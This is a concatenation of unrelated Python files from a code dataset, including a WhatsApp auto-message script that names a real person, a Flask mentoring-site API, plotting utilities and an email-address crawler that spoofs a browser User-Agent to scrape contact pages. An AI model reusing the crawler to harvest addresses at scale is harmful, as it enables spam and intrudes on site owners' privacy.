webdriver.Chrome('./chromedriver')\ndriver = webdriver.Firefox()\n\n\ndriver.get(\"https://web.whatsapp.com/\")\nwait = WebDriverWait(driver, 600)\n\n# Replace 'Friend's Name' with the name of your friend\n# or the name of a group\ntarget = '\"Nabagata Saha\"'\n# Replace the below string with your own message\nstring = \"Hello sexy\"\n\ndef web_driver_quit():\n\tdriver.quit()\n\tquit()\n\ndef send_message(target, string):\n x_arg = '//span[contains(@title,' + target.lower() + ')]'\n group_title = wait.until(EC.presence_of_element_located((By.XPATH, x_arg)))\n group_title.click()\n message = driver.find_elements_by_xpath('//*[@id=\"main\"]/footer/div[1]/div[2]/div/div[2]')[0]\n message.send_keys(string)\n sendbutton = driver.find_elements_by_xpath('//*[@id=\"main\"]/footer/div[1]/button')[0]\n sendbutton.click()\n\nif __name__ == \"__main__\":\n send_message(target, string)\n alert1 = driver.SwitchTo().Alert()\n alert1.Accept()\n web_driver_quit()\n","sub_path":"selSendMsg.py","file_name":"selSendMsg.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"35519436","text":"#!/usr/bin/env python\n# encoding: utf-8\n'''\n@author: baibing\n@contact: 243061887(qq)\n@software: pycharm\n@file: 启动进程实现多人物.py\n@time: 7/3/19 4:26 PM\n@desc:\n'''\n\n'''\nmultiprocessing 库\n跨平台版本的多进程模块,提供了一个process类来代表于i个进程\n\n'''\n\nfrom multiprocessing import Process\nimport os\nfrom time import sleep\n\n#子进程代码\ndef run(str):\n while True:\n print(\"pid: %s want run %s.... ppid:%s\"%(os.getpid(),str,os.getppid()))\n sleep(1.2)\n\nif __name__ == \"__main__\":\n print(\"主(父)进程启动...\")\n\n p = Process(target=run,args=(\"yoyoyo\",)) #创建一个进程,在当前进程中创建一个子进程,target代表要执行的任务\n #args代表进程的参数,即函数的参数,是元组形式,只有一个时要加逗号\n p.start() #启动进程\n\n while True:\n print(\"pid: %s from ice bai greetting\"% os.getpid())\n sleep(1)","sub_path":"BaseLearning/进程/拷贝文件练习/file/3、启动进程实现多任务.py","file_name":"3、启动进程实现多任务.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"653081199","text":"# Exercício 5: Considere que a cobertura da tinta é de 1 litro para cada\n# 3 metros quadrados e que a tinta é vendida em latas de 18 litros,\n# que custam R$ 80,00. Crie uma função que retorne dois valores em uma\n# tupla contendo a quantidade de latas de tinta a serem compradas e\n# o preço total a partir do tamanho de uma parede(em m²).\n\n\n# def paint_costs(area):\n# can_price = 80\n# required_liters = area / 3\n# required_cans = required_liters // 18\n# if required_liters % 18:\n# required_cans += 1\n# return required_cans, required_cans * can_price\n\n\nimport math\n\n\ndef paint_costs(area):\n can_price = 80\n required_liters = area / 3\n required_cans = math.ceil(required_liters / 18)\n return required_cans, required_cans * can_price\n\n\nprint(paint_costs(15))\n","sub_path":"modulo4_ciencia/bloco_33/dia_1/exercicio_dia/exercicio5.py","file_name":"exercicio5.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"365907223","text":"import datetime\nimport os\nimport uuid\nfrom http import HTTPStatus\nfrom typing import Tuple\n\nfrom cloudinary import uploader\nfrom dateutil.relativedelta import relativedelta\nfrom flask import Blueprint, current_app, jsonify, make_response, request\nfrom marshmallow import ValidationError\nfrom requests_toolbelt.utils import dump\nfrom sentry_sdk import capture_exception\nfrom sqlalchemy import func\nfrom sqlalchemy.exc import IntegrityError\nfrom sqlalchemy.sql import exists\n\nfrom .emails import (\n send_faculty_login_email,\n send_faculty_registration_email,\n send_student_login_email,\n send_student_registration_email,\n)\nfrom .models import (\n ActivityOption,\n ClinicalSpecialty,\n ClinicalSpecialtyOption,\n DegreeOption,\n HospitalAffiliation,\n HospitalAffiliationOption,\n PartsOfMe,\n PartsOfMeOption,\n ProfessionalInterest,\n ProfessionalInterestOption,\n Profile,\n ProfileActivity,\n ProfileDegree,\n VerificationEmail,\n VerificationToken,\n db,\n get_verification_email_by_email,\n save,\n)\nfrom .queries import matching_profiles\nfrom .schemas import profile_schema, profiles_schema, valid_email_schema\n\n\napi = Blueprint('api', __name__)\n\n\ndef get_token(headers):\n token = headers.get('Authorization')\n\n current_app.logger.info('Getting token from header %s', token)\n\n if token is None:\n return (\n error_response(\n {'token': ['unauthorized']}, status_code=HTTPStatus.UNAUTHORIZED.value\n ),\n None,\n )\n\n token_parts = token.split()\n\n if token_parts[0].lower() != 'token' or len(token_parts) != 2:\n return (\n error_response(\n {'token': ['bad format']}, status_code=HTTPStatus.UNAUTHORIZED.value\n ),\n None,\n )\n\n token_value = token_parts[1]\n\n verification_token = VerificationToken.query.get(token_value)\n\n if verification_token is None:\n return (\n error_response(\n {'token': ['unknown token']}, status_code=HTTPStatus.UNAUTHORIZED.value\n ),\n None,\n )\n\n if _token_expired(verification_token):\n login_timeout_status = 440\n\n return (\n error_response({'token': ['expired']}, status_code=login_timeout_status),\n None,\n )\n\n return None, verification_token\n\n\ndef pagination(page):\n size = 20\n\n start = (page - 1) * size\n\n end = start + size\n\n return start, end\n\n\n@api.route('/api/profiles')\ndef get_profiles():\n error, verification_token = get_token(request.headers)\n\n if error:\n return error\n\n query = request.args.get('query')\n degrees = request.args.get('degrees', '')\n affiliations = request.args.get('affiliations', '')\n\n page = int(request.args.get('page', 1))\n\n start, end = pagination(page)\n\n verification_email_id = VerificationToken.query.filter(\n VerificationToken.token == verification_token.token\n ).value(VerificationToken.email_id)\n\n queryset = (\n matching_profiles(query, degrees, affiliations)\n .order_by(\n # Is this the logged-in user's profile? If so, return it first (false)\n Profile.verification_email_id != verification_email_id,\n # Get the last word in the name.\n # Won't work with suffixes.\n func.split_part(\n Profile.name,\n ' ',\n func.array_length(\n func.string_to_array(\n func.regexp_replace(\n Profile.name, '(,|MD).*', ''\n ), # Remove suffixes after comma and MD\n ' ',\n ),\n 1, # How many words in the name\n ),\n ),\n )\n .group_by(Profile.id)\n )\n\n return jsonify(\n {\n 'profileCount': queryset.count(),\n 'profiles': profiles_schema.dump(queryset[start:end]),\n }\n )\n\n\n@api.route('/api/profiles/')\ndef get_profile(profile_id=None):\n profile = Profile.query.filter(Profile.id == profile_id).one_or_none()\n\n if profile is None:\n return error_response({'profile_id': ['Not found']}, 404)\n\n response = make_response(\n jsonify(\n profile_schema.dump(Profile.query.filter(Profile.id == profile_id).one())\n )\n )\n\n response.headers['Cache-Control'] = 'public, max-age=0'\n response.headers['Pragma'] = 'no-cache'\n response.headers['Expires'] = '0'\n\n return response\n\n\ndef error_response(reason, status_code=HTTPStatus.BAD_REQUEST.value):\n return jsonify(reason), status_code\n\n\ndef api_post(route):\n return api.route(f'/api/{route}', methods=['POST'])\n\n\ndef flat_values(values):\n return [tup[0] for tup in values]\n\n\ndef save_tags(profile, tag_values, option_class, profile_relation_class):\n activity_values = [value['tag']['value'] for value in tag_values]\n\n existing_activity_options = option_class.query.filter(\n option_class.value.in_(activity_values)\n )\n\n existing_activity_values = flat_values(existing_activity_options.values('value'))\n\n new_activity_values = [\n value for value in activity_values if value not in existing_activity_values\n ]\n\n new_activities = [option_class(value=value) for value in new_activity_values]\n\n db.session.add_all(new_activities)\n db.session.commit()\n\n existing_profile_relation_tag_ids = flat_values(\n profile_relation_class.query.filter(\n profile_relation_class.tag_id.in_(\n flat_values(existing_activity_options.values('id'))\n ),\n profile_relation_class.profile_id == profile.id,\n ).values('tag_id')\n )\n\n profile_relations = [\n profile_relation_class(tag_id=activity.id, profile_id=profile.id)\n for activity in existing_activity_options # All activities exist by this point\n if activity.id not in existing_profile_relation_tag_ids\n ]\n\n db.session.add_all(profile_relations)\n db.session.commit()\n\n\ndef save_all_tags(profile, schema):\n save_tags(\n profile, schema['affiliations'], HospitalAffiliationOption, HospitalAffiliation\n )\n save_tags(\n profile,\n schema['clinical_specialties'],\n ClinicalSpecialtyOption,\n ClinicalSpecialty,\n )\n save_tags(\n profile,\n schema['professional_interests'],\n ProfessionalInterestOption,\n ProfessionalInterest,\n )\n save_tags(profile, schema['parts_of_me'], PartsOfMeOption, PartsOfMe)\n save_tags(profile, schema['activities'], ActivityOption, ProfileActivity)\n save_tags(profile, schema['degrees'], DegreeOption, ProfileDegree)\n\n\ndef basic_profile_data(verification_token, schema):\n return {\n key: value\n for key, value in schema.items()\n if key\n not in {\n 'affiliations',\n 'clinical_specialties',\n 'professional_interests',\n 'parts_of_me',\n 'activities',\n 'degrees'\n # TODO should be `in` rather than `not in`\n }\n }\n\n\n@api_post('profile')\ndef create_profile():\n error, verification_token = get_token(request.headers)\n\n if error:\n return error\n\n try:\n schema = profile_schema.load(request.json)\n except ValidationError as err:\n capture_exception(err)\n return jsonify(err.messages), 422\n\n if db.session.query(\n exists().where(Profile.contact_email == schema['contact_email'])\n ).scalar():\n return error_response({'email': ['This email already exists in the database']})\n\n profile_data = {\n 'verification_email_id': verification_token.email_id,\n **basic_profile_data(verification_token, schema),\n }\n\n profile = Profile(**profile_data)\n\n db.session.add(profile)\n\n save_all_tags(profile, schema)\n\n return jsonify(profile_schema.dump(profile)), 201\n\n\n@api.route('/api/profiles/', methods=['PUT'])\ndef update_profile(profile_id=None):\n try:\n schema = profile_schema.load(request.json)\n except ValidationError as err:\n capture_exception(err)\n return jsonify(err.messages), 422\n\n profile = Profile.query.get(profile_id)\n\n error, verification_token = get_token(request.headers)\n\n if error:\n return error # TODO exceptions\n\n is_admin = VerificationEmail.query.filter(\n VerificationEmail.id == verification_token.email_id\n ).value(VerificationEmail.is_admin)\n\n current_app.logger.info('Edit to profile %s is_admin: %s', profile_id, is_admin)\n\n assert is_admin or profile.verification_email_id == verification_token.email_id\n\n profile_data = basic_profile_data(verification_token, schema)\n\n for key, value in profile_data.items():\n\n # TODO put this with the schema\n if key in {'name', 'contact_email'}:\n setattr(profile, key, value.strip())\n else:\n setattr(profile, key, value)\n\n try:\n save(profile)\n except IntegrityError:\n return jsonify({'error': 'Account with this contact email already exists'}), 400\n\n # TODO rather than deleting all, delete only ones that haven't changed\n profile_relation_classes = {\n ProfessionalInterest,\n ProfileActivity,\n HospitalAffiliation,\n PartsOfMe,\n ClinicalSpecialty,\n ProfileDegree,\n }\n for profile_relation_class in profile_relation_classes:\n profile_relation_class.query.filter(\n profile_relation_class.profile_id == profile.id\n ).delete()\n\n save_all_tags(profile, schema)\n\n return jsonify(profile_schema.dump(profile))\n\n\ndef generate_token():\n return str(uuid.uuid4())\n\n\n@api_post('upload-image')\ndef upload_image():\n data = request.data\n\n if not data:\n return error_response({'file': ['No image sent']})\n\n response = uploader.upload(\n data, eager=[{'width': 200, 'height': 200, 'crop': 'crop'}]\n )\n\n return jsonify({'image_url': response['eager'][0]['secure_url']})\n\n\ndef get_verification_email(\n email: str, is_mentor: bool\n) -> Tuple[VerificationEmail, bool]:\n existing_email = get_verification_email_by_email(email)\n\n if existing_email:\n return existing_email, False\n\n verification_email = VerificationEmail(email=email, is_mentor=is_mentor)\n\n save(verification_email)\n\n return verification_email, True\n\n\ndef save_verification_token(email_id, token, is_personal_device):\n verification_token = VerificationToken(\n email_id=email_id, token=token, is_personal_device=is_personal_device\n )\n\n save(verification_token)\n\n return verification_token\n\n\ndef send_token(verification_email, email_function, is_personal_device):\n current_app.logger.info('Invalidating token with id %s', verification_email.id)\n\n VerificationToken.query.filter(\n VerificationToken.email_id == verification_email.id\n ).update({VerificationToken.expired: True})\n\n token = generate_token()\n\n verification_token = save_verification_token(\n verification_email.id, token, is_personal_device\n )\n\n email_response = email_function(verification_email.email, token)\n\n email_log = dump.dump_all(email_response).decode('utf-8')\n\n verification_token.email_log = email_log\n\n return save(verification_token)\n\n\ndef process_send_verification_email(is_mentor):\n email_function = (\n send_faculty_registration_email\n if is_mentor\n else send_student_registration_email\n )\n\n try:\n schema = valid_email_schema.load(request.json)\n except ValidationError as err:\n capture_exception(err)\n return error_response(err.messages)\n\n email = schema['email'].lower()\n\n is_personal_device = schema['is_personal_device']\n\n existing_email = get_verification_email_by_email(email)\n\n if existing_email:\n return error_response({'email': ['claimed']})\n\n verification_email, _ = get_verification_email(email, is_mentor=is_mentor)\n\n send_token(\n verification_email,\n email_function=email_function,\n is_personal_device=is_personal_device,\n )\n\n return jsonify({'id': verification_email.id, 'email': email})\n\n\n@api_post('send-faculty-verification-email')\ndef send_faculty_verification_email():\n return process_send_verification_email(is_mentor=True)\n\n\n@api_post('send-student-verification-email')\ndef send_student_verification_email():\n return process_send_verification_email(is_mentor=False)\n\n\n@api_post('login')\ndef login():\n schema = valid_email_schema.load(request.json)\n\n if 'errors' in schema:\n return error_response(schema.errors)\n\n email = schema['email'].lower()\n\n is_personal_device = schema['is_personal_device']\n\n verification_email = VerificationEmail.query.filter(\n VerificationEmail.email == email\n ).one_or_none()\n\n if verification_email is None:\n return error_response({'email': ['unregistered']})\n\n email_function = (\n send_faculty_login_email\n if verification_email.is_mentor\n else send_student_login_email\n )\n\n send_token(\n verification_email,\n email_function=email_function,\n is_personal_device=is_personal_device,\n )\n\n return jsonify({'email': email})\n\n\ndef _token_expired(verification_token):\n hours_until_expiry = (\n 168 * 2 if verification_token.is_personal_device else TOKEN_EXPIRY_AGE_HOURS\n )\n\n expire_time = verification_token.date_created + relativedelta(\n hours=hours_until_expiry\n )\n\n if verification_token.expired:\n current_app.logger.info('token %s expired', verification_token.token)\n\n return True\n\n current_time = datetime.datetime.utcnow()\n\n expired = datetime.datetime.utcnow() > expire_time\n\n current_app.logger.info(\n 'current time %s versus expire time %s is expired? %s',\n current_time,\n expire_time,\n expired,\n )\n\n return expired\n\n\nTOKEN_EXPIRY_AGE_HOURS = int(os.environ.get('REACT_APP_TOKEN_EXPIRY_AGE_HOURS', 1))\n\n\n@api_post('verify-token')\ndef verify_token():\n token = request.json['token']\n\n query = VerificationToken.query.filter(VerificationToken.token == token)\n\n match = query.one_or_none()\n\n if match is None:\n return error_response({'token': ['not recognized']})\n\n if _token_expired(match):\n return error_response(\n {'token': ['expired']}, status_code=HTTPStatus.UNAUTHORIZED.value\n )\n\n match.verified = True\n\n save(match)\n\n verification_email = VerificationEmail.query.get(match.email_id)\n\n profile = get_profile_by_token(token)\n\n profile_id = profile.id if profile is not None else None\n\n available_for_mentoring = (\n profile.available_for_mentoring if profile is not None else None\n )\n\n return jsonify(\n {\n 'email': verification_email.email,\n 'is_mentor': verification_email.is_mentor,\n 'is_admin': verification_email.is_admin,\n 'profile_id': profile_id,\n 'available_for_mentoring': available_for_mentoring,\n }\n )\n\n\ndef get_profile_by_token(token):\n verification_token = VerificationToken.query.get(token)\n\n if verification_token is None:\n return None\n\n verification_email = VerificationEmail.query.get(verification_token.email_id)\n\n return Profile.query.filter(\n Profile.verification_email_id == verification_email.id\n ).one_or_none()\n\n\n@api_post('availability')\ndef availability():\n error, verification_token = get_token(request.headers)\n\n if error is not None:\n return error\n\n available = request.json['available']\n\n profile = get_profile_by_token(verification_token.token)\n\n profile.available_for_mentoring = available\n\n save(profile)\n\n return jsonify({'available': available})\n","sub_path":"server/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":15862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"374024413","text":"import numpy as np\nimport pandas as pd\nimport pickle\nfrom pathlib import Path\n\nimport statsmodels.api as sm\nfrom bokeh.layouts import row\nfrom bokeh.plotting import figure, show\nfrom bokeh.models import ColumnDataSource\nfrom bokeh.io import export_png\n\nimport sys\n\n###############################################################################\ndir = Path(__file__).resolve().parents[2]\ncurrent_week = \"week\" + str(sys.argv[1])\n\npath = dir / \"output\" / current_week\npath.mkdir(parents=True, exist_ok=True)\n\n###############################################################################\n\ndef restrict(dataf, female=None):\n \n df_working = dataf[dataf[\"working_real\"]==1]\n \n if female==1:\n df_out = df_working[df_working[\"female_real\"]==1]\n elif female==0:\n df_out = df_working[df_working[\"female_real\"]==0]\n else:\n df_out = df_working\n \n return df_out\n\ndef get_unemp(dataf):\n dataf = dataf.copy()\n \n df_out = pd.DataFrame()\n df_out[\"emp_female\"] = dataf[dataf[\"female_real\"]==1].groupby(\"age_real\")[\"working_real\"].mean()\n df_out[\"n_female\"] = dataf[dataf[\"female_real\"]==1].groupby(\"age_real\")[\"working_real\"].count()\n\n df_out[\"emp_male\"] = dataf[dataf[\"female_real\"]==0].groupby(\"age_real\")[\"working_real\"].mean()\n df_out[\"n_male\"] = dataf[dataf[\"female_real\"]==0].groupby(\"age_real\")[\"working_real\"].count()\n \n return df_out\n\ndef group_age(dataf):\n dataf = dataf.copy()\n \n df_out = dataf.groupby(\"age_real\").median()\n df_out[\"n\"] = dataf.groupby(\"age_real\")[\"pid\"].count()\n return df_out\n\ndef make_pretty(p):\n p.xgrid.grid_line_color = None\n p.yaxis.minor_tick_line_width=0\n p.xaxis.minor_tick_line_width=0\n \n p.legend.location = \"bottom_right\"\n\n return p \n\n\ndef plot_sample(dataf, str_path, rest=False):\n \n if rest:\n dataf = restrict(dataf)\n else:\n dataf = dataf.copy()\n \n \n ll = dataf.groupby(\"period_ahead\")[\"pid\"].count().values\n x = np.arange(len(ll))\n \n p=figure(title=\"Number of people by length of observation\",\n y_range = (0, 5500))\n p.vbar(x, top=ll)\n \n p = make_pretty(p)\n \n export_png(p, filename=str(path / str_path))\n \ndef plot_sample_coeff(dataf, str_path):\n \n dataf = dataf.copy()\n dataf_rest = restrict(dataf)\n \n ll = dataf.groupby(\"period_ahead\")[\"pid\"].count().values\n ll_rest = dataf_rest.groupby(\"period_ahead\")[\"pid\"].count().values\n \n ll_coeff = ll_rest/ll\n x = np.arange(len(ll_coeff))\n \n p=figure(title=\"Fraction of people working by lenght of observation\",\n y_range=(0, 1))\n p.vbar(x, top=ll_coeff)\n \n p = make_pretty(p)\n export_png(p, filename=str(path / str_path))\n\n \ndef plot_by_age(dataf, str_path, rest=False):\n \n if rest:\n dataf = restrict(dataf)\n else:\n dataf = dataf.copy()\n \n ll = dataf.groupby(\"age_real\")[\"pid\"].count().values\n x = np.arange(len(ll)) + min(dataf[\"age_real\"])\n \n p=figure(title=\"Number of observed people by age\",\n y_range = (0, 2500))\n p.vbar(x, top=ll)\n \n p = make_pretty(p)\n export_png(p, filename=str(path / str_path))\n \ndef plot_2c(dataf, str_path):\n \n dataf = dataf.copy()\n \n df_group = dataf.groupby(\"pid\")[[\"working_real\", \"period_ahead\"]]\n \n # Getting mean of working years per person\n work = df_group.mean()[\"working_real\"]\n # Getting max amount of periods we observe a person\n obs = df_group.max()[\"period_ahead\"]\n \n # Concat those two frames\n df_combined = pd.concat([work, obs], axis=1)\n ll_mean = df_combined.groupby(\"period_ahead\").mean().values\n ll_median = df_combined.groupby(\"period_ahead\").median().values\n \n overall_mean = dataf[\"working_real\"].mean()\n \n x = np.arange(len(ll_mean))\n \n source = ColumnDataSource(data={\"x\": x,\n \"y_mean\": ll_mean,\n \"y_median\": ll_median,\n \"overall_mean\": np.repeat(overall_mean, len(ll_mean))})\n \n p=figure(title=\"Fraction of working years by length of observation\",\n y_range=(0, 1))\n \n p.line(x=\"x\", y=\"y_mean\", source=source,\n line_color=\"black\", line_dash=\"solid\", line_width=3,\n legend_label = \"mean\")\n \n # p.line(x=\"x\", y=\"y_median\", source=source,\n # line_color=\"black\", line_dash=\"dashed\", line_width=3,\n # legend_label = \"median\")\n \n p.line(x=\"x\", y=\"overall_mean\", source=source,\n line_color=\"red\", line_dash=\"solid\", line_width=2,\n legend_label = \"Overall mean\")\n \n p = make_pretty(p)\n export_png(p, filename=str(path/ str_path)) \n\n\nif __name__ == \"__main__\": \n df = pd.read_pickle(path / \"df_analysis_cohort\")\n \n \n plot_2c(df, \"fig2c.png\")\n plot_sample(df, \"sample_duration.png\")\n plot_sample(df, \"sample_duration_working.png\", rest=True)\n plot_sample_coeff(df, \"sample_duration_relative.png\")\n plot_by_age(df, \"sample_age.png\")\n plot_by_age(df, \"sample_age_working.png\", rest=True)\n\n\n","sub_path":"src/validation/sample_plots.py","file_name":"sample_plots.py","file_ext":"py","file_size_in_byte":5099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"454741500","text":"ipname = input(\"Enter the name of input file : \")\r\nip = open(ipname, \"r\")\r\no1 = \"Output \"\r\nextension = \".txt\"\r\noutputname = o1 + ipname[:-3] + extension\r\nout = open(outputname, \"w\")\r\n\r\nt = ip.readline();t=int(t)\r\n\r\nfor t_i in range(t):\r\n pc = ip.readline(); pc = list(pc);\r\n if(t_i!=t-1):\r\n pc = pc[:-1]\r\n count = 0\r\n lenth = len(pc)\r\n if lenth == 1 and pc[0]=='-':\r\n count=1\r\n elif lenth==1 and pc[0]=='+':\r\n count=0\r\n if(lenth>=2):\r\n for i in range(len(pc)-1):\r\n if(pc[i]!=pc[i+1]):\r\n count += 1\r\n if(pc[-1]=='-'):\r\n count += 1\r\n out.writelines(\"Case #%d: %d\\n\" % (t_i+1,count))\r\n\r\nip.close()\r\nout.close()\r\n","sub_path":"codes/CodeJamCrawler/16_0_2/dkrocks365/nn.py","file_name":"nn.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"561648194","text":"# E-Mail-crawler\n# by Mark Schneemann\n#\n# Usage:\n# python3 mail-crawler.py -u \n# python3 mail-crawler.py -l #\n#\n# Optional: add -v for verbose mode\n#\n# Examples:\n# python3 mail-crawler.py 2 -u https://privacyscore.org\n# python3 mail-crawler.py 3 -l lists/InstitutionsOfHigherEducation.csv\n# ------------------------------ Config ------------------------------\n\n# Typical sites that contain email addresses.\n# Everything is lowercase.\nimport traceback\nimport tldextract\nimport argparse\nimport requests\nimport urllib\nimport urllib.request\nfrom parsers.RegexParser import RegexParser\nfrom parsers.MailtoParser import MailtoParser\nfrom loaders.SeleniumChromeLoader import SeleniumChromeLoader\npotential_sites_en = [\n \"impressum\", \"support\", \"contact\", \"imprint\", \"privacy\", \"imprint\"]\npotential_sites_de = [\"kontakt\", \"datenschutz\", \"über\"]\npotential_sites_debug = []\npotential_sites = set(potential_sites_en +\n potential_sites_de + potential_sites_debug)\n\n# ignored files\nignore_files = [\".exe\", \".png\", \".pdf\", \".jpg\"]\nignore_protocols = [\"mailto:\", \"tel:\", \"javascript:\"]\n\n# Header of the crawler.\n# Changed the User-Agent to old Mozilla - not everybody likes crawlers.\n# currently not used\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (X11; Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'\n}\n\n# enable loader\n\n# choose loader here:\n# RequestsLoader - Loads html by just using requests.get\n# (fast but no js and rendering)\n# SplashLoader - Loads rendered html by using a dockerized splash-browser\n# (slow but with js and rendering - has a ton of memory leaks)\n# SeleniumChromeLoader - Use webdriver and chrome in headless mode\nloader = SeleniumChromeLoader\n\n# enabled parsers\n# Cloudflare Protection (deprecated)\n# a href=\"mailto...\n# regex for something@something.something\n# look for spoken chars like at or [at] instead of @ (deprecated)\n# handle \"javascript:linkTo_UnCryptMailto...\" (deprecated)\nparsers = [MailtoParser, RegexParser]\n# --------------------------- Warning! --------------------------\n# ----------------- Don't read below this line! -----------------\n# ----------------------- Super ugly code! ----------------------\n\n# import libraries\n\nVERBOSE = False\n\n\ndef build_url(baseurl, path):\n # Returns a list in the structure of urlparse.ParseResult\n url_base = urllib.parse.urlparse(baseurl)\n url_new = urllib.parse.urlparse(path)\n\n if url_new.scheme == \"\":\n url_new = url_new._replace(scheme=url_base.scheme)\n if url_new.netloc == \"\":\n url_new = url_new._replace(netloc=url_base.netloc)\n\n return urllib.parse.urlunparse(url_new)\n\n\ndef get_promising_urls(soup, base):\n global VERBOSE\n global potential_sites\n global ignore_files\n global ignore_protocols\n\n found_sites = list()\n counter = 0\n soup_links = set(soup.find_all('a', href=True))\n for link in soup_links:\n for site in potential_sites:\n if (link.string is not None and site in link.string.lower()) or site in str(link['href']).lower():\n if link['href'] not in found_sites:\n if VERBOSE:\n print(\"\\t\\t'found \" + site + \": \" + str(link['href']))\n new_link = link['href']\n\n ignored = False\n\n for p in ignore_protocols:\n if new_link.lower().strip().startswith(p):\n ignored = True\n\n for i in ignore_files:\n if new_link.lower().strip().endswith(i) and not ignored:\n ignored = True\n\n if not ignored:\n check_this_site = build_url(base, new_link)\n # do not crawl other domains\n base_domain = tldextract.extract(base).domain\n check_domain = tldextract.extract(\n check_this_site).domain\n if base_domain == check_domain and check_this_site != \"\":\n found_sites.append(check_this_site)\n return found_sites\n\n\ndef get_promising_mails(soup):\n global VERBOSE\n global parsers\n email_addresses = set()\n for parser in parsers:\n email_addresses = email_addresses | parser.extract_mail_addresses(\n soup, VERBOSE)\n\n return email_addresses\n\n\ndef process_url(target):\n global VERBOSE\n global loader\n\n try:\n # check for redirects (thanks aok!)\n request = requests.get(target, allow_redirects=True, timeout=10)\n if len(request.history) > 0:\n target = request.url\n if VERBOSE:\n print(\"Redirected to: \" + request.url)\n request.connection.close()\n if VERBOSE:\n print(\"\\nProcessing: \" + target)\n email_addresses = set()\n links = list()\n soup = loader.load_and_soup(target)\n email_addresses = get_promising_mails(soup)\n links = get_promising_urls(soup, target)\n except Exception as e:\n print(\"Error: \" + target + \":\")\n print(repr(e).split('(')[0])\n if VERBOSE:\n tb = traceback.format_exc()\n print(tb)\n email_addresses = set()\n links = set()\n return email_addresses, links\n\n\ndef strip_emails(results):\n emails = set()\n for email in results:\n if email.startswith(\"mailto:\"):\n emails.add(email[7:])\n elif email.startswith(\"mailto*\"):\n emails.add(email[7:])\n elif email.startswith(\"regex:\"):\n emails.add(email[6:])\n else:\n emails.add(email)\n return emails\n\n\ndef crawl(target, depth, done_urls):\n current_link = target\n emails = set()\n\n if int(depth) > 0:\n new_email_addresses, new_links = process_url(current_link)\n emails = emails.union(set(new_email_addresses))\n done_urls = done_urls.union(set([current_link]))\n for link in new_links:\n if link not in done_urls:\n done_urls, new_emails = crawl(link, int(depth) - 1, done_urls)\n emails = emails.union(new_emails)\n emails = strip_emails(emails)\n if len(emails) > 5:\n return done_urls, emails\n return done_urls, emails\n\n\ndef filter_results_from_regex(emails):\n # filter results for regex errors\n results = []\n for e1 in emails:\n counter = 0\n for e2 in emails:\n if e2.startswith(e1):\n counter += 1\n if counter is 1:\n results.append(e1)\n else:\n if VERBOSE:\n print(e1 + \" seems to be an regex related error.\")\n return results\n\n\ndef Main():\n global VERBOSE\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"depth\", help=\"Depth of the crawling-prozess. Should not be > 3\", type=int)\n parser.add_argument(\"-u\", \"--url\", help=\"URL of a site.\", type=str)\n parser.add_argument(\n \"-l\", \"--list\", help=\"List of a sites. Should be a PrivacyScore-Export.\", type=str)\n parser.add_argument(\"-v\", \"--verbose\", help=\"Verbose mode\",\n action=\"store_true\", default=False)\n args = parser.parse_args()\n\n VERBOSE = args.verbose\n\n if args.url:\n loader.init()\n done_urls, emails = crawl(args.url, args.depth, set())\n if VERBOSE:\n print(\"\\nResult:\")\n\n results = filter_results_from_regex(emails)\n for email in sorted(results):\n print(email)\n loader.cleanup()\n if args.list:\n loader.init()\n VERBOSE = False\n hits = 0\n file = open(args.list, \"r\")\n text = file.read()\n lines = text.split(\"\\n\")\n for i in range(1, len(lines) - 1):\n split_me = lines[i].split(\";\")\n url = split_me[0]\n done_urls, emails = crawl(url, args.depth, set())\n print(str(i) + \"/\" + str(len(lines) - 2) +\n \"\\t\" + url + \"\\t\" + str(len(emails)))\n if len(emails) > 0:\n hits += 1\n results = filter_results_from_regex(emails)\n for email in sorted(results):\n print(\"\\t\\t\" + email)\n else:\n print(\"\\tNO HITS! TODO!\")\n print(str(hits) + \" of \" + str(len(lines) - 2))\n loader.cleanup()\n\n\nif __name__ == \"__main__\":\n Main()\n","sub_path":"mail-crawler.py","file_name":"mail-crawler.py","file_ext":"py","file_size_in_byte":8468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"221279351","text":"import math\nimport torch\nimport gpytorch\nimport numpy as np\nimport statsmodels.api as sm\nfrom tqdm import tqdm\nfrom torch.utils.data import TensorDataset, DataLoader\nfrom gpytorch.models import ApproximateGP\nfrom gpytorch.variational import CholeskyVariationalDistribution\nfrom gpytorch.variational import VariationalStrategy\n\nclass GPModel(ApproximateGP):\n \"\"\" Class for GPyTorch model.\n\n Attributes\n ----------\n mean_module : gpytorch Mean\n Module to calculate mean.\n covar_module : gpytorch Kernel\n Module to calculate covariance.\n \"\"\"\n def __init__(self, inducing_points,nu=2.5,length_scale=1,length_scale_bounds=(1e-5,1e5)):\n \"\"\" Create a GPModel object.\n\n Parameters\n ----------\n inducing_points: array\n Array of inducing points.\n length_scale: float, default=1\n Length scale parameter of Matern kernel.\n length_scale_bounds: pair of floats >= 0 or 'fixed', default=(1e-5, 1e5)\n The lower and upper bound on length_scale. If set to 'fixed', ‘length_scale’ cannot be changed during hyperparameter tuning.\n nu: float, default=2.5\n Nu parameter of Matern kernel.\n \n Raises\n ------\n ValueError\n Invalid argument for length_scale_bounds\n \"\"\"\n variational_distribution = CholeskyVariationalDistribution(inducing_points.size(0))\n variational_strategy = VariationalStrategy(self, inducing_points, variational_distribution, learn_inducing_locations=True)\n super(GPModel, self).__init__(variational_strategy)\n\n self.mean_module = gpytorch.means.ConstantMean()\n\n if length_scale_bounds == 'fixed':\n constraint = gpytorch.constraints.Interval(length_scale - 0.001,length_scale + 0.0001)\n elif 